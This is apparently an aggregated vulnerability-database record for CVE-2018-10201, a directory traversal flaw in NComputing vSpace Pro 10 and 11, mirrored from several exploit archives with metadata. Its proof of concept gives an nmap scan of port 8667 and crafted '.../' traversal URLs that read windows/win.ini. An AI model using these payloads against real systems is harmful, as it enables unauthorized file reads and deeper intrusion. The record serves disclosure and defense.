ID PACKETSTORM:147303 Type packetstorm Reporter Javier Bernardo Modified 2018-04-23T00:00:00
Description
`# Exploit Title: Ncomputing vSpace Pro v10 and v11 - Directory Traversal Vulnerability
# Date: 2018-04-20
# Software Vendor: NComputing
# Software Link:
# Author: Javier Bernardo
# CVE: CVE-2018-10201
# Category: Webapps
#[Description]
#
#It is possible to read arbitrary files outside the root directory of
#the web server. This vulnerability could be exploited remotely by a
#crafted URL without credentials, with a|/ or a|\ or a|./ or a|.\ as a
#directory-traversal pattern to TCP port 8667.
#
#An attacker can make use of this vulnerability to step out of the root
#directory and access other parts of the file system. This might give
#the attacker the ability to view restricted files, which could provide
#the attacker with more information required to further compromise the system.
#[PoC]
nmap -p T:8667 -Pn your_vSpace_server
Nmap scan report for your_vSpace_server (x.x.x.x)
Host is up (0.044s latency).
PORT STATE SERVICE
8667/tcp open unknown
http://your_vSpace_server:8667/.../.../.../.../.../.../.../.../.../windows/win.ini
http://your_vSpace_server:8667/...\...\...\...\...\...\...\...\...\windows\win.ini
http://your_vSpace_server:8667/..../..../..../..../..../..../..../..../..../windows/win.ini
http://your_vSpace_server:8667/....\....\....\....\....\....\....\....\....\windows\win.ini
`
{"sourceData": "`# Exploit Title: Ncomputing vSpace Pro v10 and v11 - Directory Traversal Vulnerability \n# Date: 2018-04-20 \n# Software Vendor: NComputing \n# Software Link: \n# Author: Javier Bernardo \n# CVE: CVE-2018-10201 \n# Category: Webapps \n \n#[Description] \n# \n#It is possible to read arbitrary files outside the root directory of \n#the web server. This vulnerability could be exploited remotely by a \n#crafted URL without credentials, with a|/ or a|\\ or a|./ or a|.\\ as a \n#directory-traversal pattern to TCP port 8667. \n# \n#An attacker can make use of this vulnerability to step out of the root \n#directory and access other parts of the file system. This might give \n#the attacker the ability to view restricted files, which could provide \n#the attacker with more information required to further compromise the system. \n \n#[PoC] \n \nnmap -p T:8667 -Pn your_vSpace_server \n \nNmap scan report for your_vSpace_server (x.x.x.x) \nHost is up (0.044s latency). \n \nPORT STATE SERVICE \n8667/tcp open unknown \n \nhttp://your_vSpace_server:8667/.../.../.../.../.../.../.../.../.../windows/win.ini \n \nhttp://your_vSpace_server:8667/...\\...\\...\\...\\...\\...\\...\\...\\...\\windows\\win.ini \n \nhttp://your_vSpace_server:8667/..../..../..../..../..../..../..../..../..../windows/win.ini \n \nhttp://your_vSpace_server:8667/....\\....\\....\\....\\....\\....\\....\\....\\....\\windows\\win.ini \n \n \n`\n", "history": [], "description": "", "sourceHref": "https://packetstormsecurity.com/files/download/147303/ncomputingvspace-traversal.txt", "reporter": "Javier Bernardo", "href": "https://packetstormsecurity.com/files/147303/Ncomputing-vSPace-Pro-10-11-Directory-Traversal.html", "type": "packetstorm", "hashmap": [{"key": "bulletinFamily", "hash": "708697c63f7eb369319c6523380bdf7a"}, {"key": "cvelist", "hash": "61472526dd714abcd42be71641ba27c0"}, {"key": "cvss", "hash": "8cd4821cb504d25572038ed182587d85"}, {"key": "description", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "href", "hash": "d99973f70b0612949c45c54e6bded3b4"}, {"key": "modified", "hash": "40a9e8a0c2b3808328519fbaa42c9028"}, {"key": "published", "hash": "40a9e8a0c2b3808328519fbaa42c9028"}, {"key": "references", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "reporter", "hash": "77f5364da361255c1822dd2e57a7598f"}, {"key": "sourceData", "hash": "3424ab606f90389e34d5eeea954ff019"}, {"key": "sourceHref", "hash": "2ba91396befd95fee81ab15f244e2da0"}, {"key": "title", "hash": "b73e9a7bd5c80306ede2f434f43ac3b0"}, {"key": "type", "hash": "6466ca3735f647eeaed965d9e71bd35d"}], "viewCount": 8, "references": [], "lastseen": "2018-04-24T09:30:29", "published": "2018-04-23T00:00:00", "objectVersion": "1.3", "cvelist": ["CVE-2018-10201"], "id": "PACKETSTORM:147303", "hash": "adccaaa162c10ae5dde110dde756b5d188be6f06740688ddb040041a6bd2bb4c", "modified": "2018-04-23T00:00:00", "title": "Ncomputing vSPace Pro 10 / 11 Directory Traversal", "edition": 1, "cvss": {"score": 0.0, "vector": "NONE"}, "bulletinFamily": "exploit", "enchantments": {"score": {"value": 5.3, "vector": "NONE", "modified": "2018-04-24T09:30:29"}, "dependencies": {"references": [{"type": "cve", "idList": ["CVE-2018-10201"]}, {"type": "exploitdb", "idList": ["EDB-ID:44497"]}, {"type": "zdt", "idList": ["1337DAY-ID-30225"]}], "modified": "2018-04-24T09:30:29"}, "vulnersScore": 5.3}}
{"cve": [{"lastseen": "2019-05-29T18:19:41", "bulletinFamily": "NVD", "description": "An issue was discovered in NcMonitorServer.exe in NC Monitor Server in NComputing vSpace Pro 10 and 11. It is possible to read arbitrary files outside the root directory of the web server. This vulnerability could be exploited remotely by a crafted URL without credentials, with .../ or ...\\ or ..../ or ....\\ as a directory-traversal pattern to TCP port 8667.", "modified": "2018-05-16T01:29:00", "id": "CVE-2018-10201", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2018-10201", "published": "2018-04-20T08:29:00", "title": "CVE-2018-10201", "type": "cve", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}], "exploitdb": [{"lastseen": "2018-05-24T14:16:24", "bulletinFamily": "exploit", "description": "Ncomputing vSpace Pro 10/11 - Directory Traversal. CVE-2018-10201. Webapps exploit for Windows platform", "modified": "2018-04-23T00:00:00", "published": "2018-04-23T00:00:00", "id": "EDB-ID:44497", "href": "https://www.exploit-db.com/exploits/44497/", "type": "exploitdb", "title": "Ncomputing vSpace Pro 10/11 - Directory Traversal", "sourceData": "# Exploit Title: Ncomputing vSpace Pro v10 and v11 - Directory Traversal Vulnerability\r\n# Date: 2018-04-20\r\n# Software Vendor: NComputing\r\n# Software Link: \r\n# Author: Javier Bernardo\r\n# Contact: javier@kwell.net\r\n# Website: http://www.kwell.net\r\n# CVE: CVE-2018-10201\r\n# Category: Webapps\r\n\r\n#[Description]\r\n#\r\n#It is possible to read arbitrary files outside the root directory of\r\n#the web server. This vulnerability could be exploited remotely by a\r\n#crafted URL without credentials, with \u2026/ or \u2026\\ or \u2026./ or \u2026.\\ as a\r\n#directory-traversal pattern to TCP port 8667.\r\n#\r\n#An attacker can make use of this vulnerability to step out of the root\r\n#directory and access other parts of the file system. This might give\r\n#the attacker the ability to view restricted files, which could provide\r\n#the attacker with more information required to further compromise the system.\r\n\r\n#[PoC]\r\n\r\nnmap -p T:8667 -Pn your_vSpace_server\r\n\r\nNmap scan report for your_vSpace_server (x.x.x.x)\r\nHost is up (0.044s latency).\r\n\r\nPORT STATE SERVICE\r\n8667/tcp open unknown\r\n\r\nhttp://your_vSpace_server:8667/.../.../.../.../.../.../.../.../.../windows/win.ini\r\n\r\nhttp://your_vSpace_server:8667/...\\...\\...\\...\\...\\...\\...\\...\\...\\windows\\win.ini\r\n\r\nhttp://your_vSpace_server:8667/..../..../..../..../..../..../..../..../..../windows/win.ini\r\n\r\nhttp://your_vSpace_server:8667/....\\....\\....\\....\\....\\....\\....\\....\\....\\windows\\win.ini", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}, "sourceHref": "https://www.exploit-db.com/download/44497/"}], "zdt": [{"lastseen": "2018-04-23T20:02:35", "bulletinFamily": "exploit", "description": "Exploit for windows platform in category web applications", "modified": "2018-04-23T00:00:00", "published": "2018-04-23T00:00:00", "href": "https://0day.today/exploit/description/30225", "id": "1337DAY-ID-30225", "title": "Ncomputing vSpace Pro v10 and v11 - Directory Traversal PoC", "type": "zdt", "sourceData": "# Exploit Title: Ncomputing vSpace Pro v10 and v11 - Directory Traversal Vulnerability\r\n# Software Vendor: NComputing\r\n# Software Link: \r\n# Author: Javier Bernardo\r\n# CVE: CVE-2018-10201\r\n# Category: Webapps\r\n \r\n#[Description]\r\n#\r\n#It is possible to read arbitrary files outside the root directory of\r\n#the web server. This vulnerability could be exploited remotely by a\r\n#crafted URL without credentials, with \u2026/ or \u2026\\ or \u2026./ or \u2026.\\ as a\r\n#directory-traversal pattern to TCP port 8667.\r\n#\r\n#An attacker can make use of this vulnerability to step out of the root\r\n#directory and access other parts of the file system. This might give\r\n#the attacker the ability to view restricted files, which could provide\r\n#the attacker with more information required to further compromise the system.\r\n \r\n#[PoC]\r\n \r\nnmap -p T:8667 -Pn your_vSpace_server\r\n \r\nNmap scan report for your_vSpace_server (x.x.x.x)\r\nHost is up (0.044s latency).\r\n \r\nPORT STATE SERVICE\r\n8667/tcp open unknown\r\n \r\nhttp://your_vSpace_server:8667/.../.../.../.../.../.../.../.../.../windows/win.ini\r\n \r\nhttp://your_vSpace_server:8667/...\\...\\...\\...\\...\\...\\...\\...\\...\\windows\\win.ini\r\n \r\nhttp://your_vSpace_server:8667/..../..../..../..../..../..../..../..../..../windows/win.ini\r\n \r\nhttp://your_vSpace_server:8667/....\\....\\....\\....\\....\\....\\....\\....\\....\\windows\\win.ini\n\n# 0day.today [2018-04-23] #", "sourceHref": "https://0day.today/exploit/30225", "cvss": {"score": 0.0, "vector": "NONE"}}]}
